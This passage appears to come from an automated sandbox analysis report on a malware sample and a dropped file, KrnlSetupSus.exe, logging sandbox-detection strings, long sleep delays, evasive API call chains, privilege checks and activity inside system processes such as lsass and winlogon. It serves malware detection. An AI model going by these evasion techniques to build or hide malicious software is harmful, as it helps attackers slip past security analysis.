                              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                              Source: RdLfpZY5A9.exe, 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, ntoskrnl.exe.3.dr, KrnlSetupSus.exe.0.drBinary or memory string: SBIEDLL.DLL
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeMemory allocated: 2730000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeMemory allocated: 1A930000 memory reserve | memory write watchJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeMemory allocated: 1300000 memory reserve | memory write watchJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeMemory allocated: 1ADE0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599890Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599781Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599672Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599562Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599448Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599338Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599233Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599124Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599015Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598906Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598796Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598687Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598578Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598465Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598359Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598248Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598115Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597999Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597890Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597777Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597672Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597562Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597452Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597343Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597229Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597125Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597014Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596906Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596797Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596687Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596578Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596468Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596345Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596218Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596109Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596000Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 595889Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 595125Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594998Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594890Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594781Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594671Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594562Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594453Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594343Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594234Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594124Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594014Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 593906Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 593796Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 593687Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeWindow / User API: threadDelayed 7011Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeWindow / User API: threadDelayed 2794Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4048Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4222Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 376Jump to behavior
                              Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 7857Jump to behavior
                              Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 2142Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7178Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2500Jump to behavior
                              Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9831
                              Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9859
                              Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_6-8067
                              Source: C:\ProgramData\Install.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_2-245
                              Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_6-9531
                              Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_6-8075
                              Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-8011
                              Source: C:\Windows\System32\lsass.exeAPI coverage: 6.9 %
                              Source: C:\Windows\System32\svchost.exeAPI coverage: 5.3 %
                              Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
                              Source: C:\Windows\System32\svchost.exeAPI coverage: 6.2 %
                              Source: C:\Windows\System32\svchost.exeAPI coverage: 5.9 %
                              Source: C:\Windows\System32\svchost.exeAPI coverage: 5.3 %
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exe TID: 7340Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -600000s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -599890s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -599781s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -599672s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -599562s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -599448s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -599338s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -599233s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -599124s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -599015s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -598906s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -598796s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -598687s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -598578s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -598465s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -598359s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -598248s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -598115s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -597999s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -597890s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -597777s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -597672s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -597562s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -597452s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -597343s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -597229s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -597125s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -597014s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -596906s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -596797s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -596687s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -596578s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -596468s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -596345s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -596218s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -596109s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -596000s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -595889s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -595125s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -594998s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -594890s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -594781s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -594671s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -594562s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -594453s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -594343s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -594234s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -594124s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -594014s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -593906s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -593796s >= -30000sJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976Thread sleep time: -593687s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep count: 4048 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep count: 4222 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\dllhost.exe TID: 7700Thread sleep count: 376 > 30Jump to behavior
                              Source: C:\Windows\System32\dllhost.exe TID: 7700Thread sleep time: -37600s >= -30000sJump to behavior
                              Source: C:\Windows\System32\dllhost.exe TID: 7684Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\winlogon.exe TID: 7832Thread sleep count: 7857 > 30Jump to behavior
                              Source: C:\Windows\System32\winlogon.exe TID: 7832Thread sleep time: -7857000s >= -30000sJump to behavior
                              Source: C:\Windows\System32\winlogon.exe TID: 7832Thread sleep count: 2142 > 30Jump to behavior
                              Source: C:\Windows\System32\winlogon.exe TID: 7832Thread sleep time: -2142000s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                              Source: C:\Windows\System32\lsass.exe TID: 7856Thread sleep count: 9831 > 30
                              Source: C:\Windows\System32\lsass.exe TID: 7856Thread sleep time: -9831000s >= -30000s
                              Source: C:\Windows\System32\lsass.exe TID: 7856Thread sleep count: 108 > 30
                              Source: C:\Windows\System32\lsass.exe TID: 7856Thread sleep time: -108000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 7868Thread sleep count: 245 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 7868Thread sleep time: -245000s >= -30000s
                              Source: C:\Windows\System32\dwm.exe TID: 7912Thread sleep count: 9859 > 30
                              Source: C:\Windows\System32\dwm.exe TID: 7912Thread sleep time: -9859000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 7932Thread sleep count: 258 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 7932Thread sleep time: -258000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 7992Thread sleep count: 259 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 7992Thread sleep time: -259000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8012Thread sleep count: 97 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 8012Thread sleep time: -97000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8020Thread sleep count: 251 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 8020Thread sleep time: -251000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8028Thread sleep count: 43 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 8028Thread sleep time: -43000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8036Thread sleep count: 257 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 8036Thread sleep time: -257000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8052Thread sleep count: 247 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 8052Thread sleep time: -247000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8072Thread sleep count: 227 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 8072Thread sleep time: -227000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8080Thread sleep count: 240 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 8080Thread sleep time: -240000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8088Thread sleep count: 238 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 8088Thread sleep time: -238000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8096Thread sleep count: 249 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 8096Thread sleep time: -249000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8104Thread sleep count: 253 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 8104Thread sleep time: -253000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8144Thread sleep count: 242 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 8144Thread sleep time: -242000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8160Thread sleep count: 252 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 8160Thread sleep time: -252000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8168Thread sleep count: 248 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 8168Thread sleep time: -248000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8176Thread sleep count: 255 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 8176Thread sleep time: -255000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 8184Thread sleep count: 246 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 8184Thread sleep time: -246000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 608Thread sleep count: 242 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 608Thread sleep time: -242000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 2736Thread sleep count: 227 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 2736Thread sleep time: -227000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 3068Thread sleep count: 66 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 3068Thread sleep time: -66000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 2068Thread sleep count: 230 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 2068Thread sleep time: -230000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 5836Thread sleep count: 64 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 5836Thread sleep time: -64000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 4564Thread sleep count: 65 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 4564Thread sleep time: -65000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 6732Thread sleep count: 235 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 6732Thread sleep time: -235000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 6884Thread sleep count: 254 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 6884Thread sleep time: -254000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 5848Thread sleep count: 242 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 5848Thread sleep time: -242000s >= -30000s
                              Source: C:\Windows\System32\spoolsv.exe TID: 6772Thread sleep count: 166 > 30
                              Source: C:\Windows\System32\spoolsv.exe TID: 6772Thread sleep time: -166000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 5644Thread sleep count: 227 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 5644Thread sleep time: -227000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 5660Thread sleep count: 54 > 30
                              Source: C:\Windows\System32\svchost.exe TID: 5660Thread sleep time: -54000s >= -30000s
                              Source: C:\ProgramData\KrnlSetupSus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                              Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                              Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
                              Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
                              Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                              Source: C:\ProgramData\KrnlSetupSus.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C56D654 FindFirstFileExW,3_2_1C56D654
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C56D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_1C56D7D8
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000290EDD0D654 FindFirstFileExW,6_2_00000290EDD0D654
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000290EDD0D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_00000290EDD0D7D8
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_2_000002E99175D654 FindFirstFileExW,7_2_000002E99175D654
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_2_000002E99175D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_000002E99175D7D8
                              Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000213BDCED7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_00000213BDCED7D8
                              Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000213BDCED654 FindFirstFileExW,10_2_00000213BDCED654
                              Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000158709DD7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,11_2_00000158709DD7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000158709DD654 FindFirstFileExW,11_2_00000158709DD654
                              Source: C:\Windows\System32\dwm.exeCode function: 12_2_0000026DB158D654 FindFirstFileExW,12_2_0000026DB158D654
                              Source: C:\Windows\System32\dwm.exeCode function: 12_2_0000026DB158D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_0000026DB158D7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002A3F066D654 FindFirstFileExW,13_2_000002A3F066D654
                              Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002A3F066D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,13_2_000002A3F066D7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002C9AFBBD7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000002C9AFBBD7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002C9AFBBD654 FindFirstFileExW,15_2_000002C9AFBBD654
                              Source: C:\Windows\System32\svchost.exeCode function: 16_2_000002C06FD4D654 FindFirstFileExW,16_2_000002C06FD4D654
                              Source: C:\Windows\System32\svchost.exeCode function: 16_2_000002C06FD4D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_000002C06FD4D7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 17_2_000002917C3BD654 FindFirstFileExW,17_2_000002917C3BD654
                              Source: C:\Windows\System32\svchost.exeCode function: 17_2_000002917C3BD7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_000002917C3BD7D8
